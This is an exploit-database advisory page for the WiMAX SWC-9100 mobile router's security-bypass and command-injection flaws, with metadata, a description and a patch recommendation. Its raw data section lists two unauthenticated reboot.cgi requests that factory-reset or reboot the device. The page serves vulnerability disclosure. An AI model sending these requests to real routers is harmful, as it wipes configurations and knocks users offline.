header-logo
Suggest Exploit
vendor:
SWC-9100 Mobile Router
by:
SecurityFocus
8,8
CVSS
HIGH
Security Bypass and Command Injection
78, 94
CWE
Product Name: SWC-9100 Mobile Router
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

WiMAX SWC-9100 Mobile Router Security Bypass and Command Injection Vulnerabilities

WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. Attackers can exploit these issues by sending specially crafted HTTP requests to the vulnerable router.

Mitigation:

Users should apply the latest available updates from the vendor to address these issues.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/65306/info

WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.

Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. 

http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply